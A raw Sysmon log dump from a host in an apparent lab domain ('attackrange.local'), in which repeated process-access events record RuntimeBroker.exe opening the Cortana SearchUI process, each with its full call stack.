13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 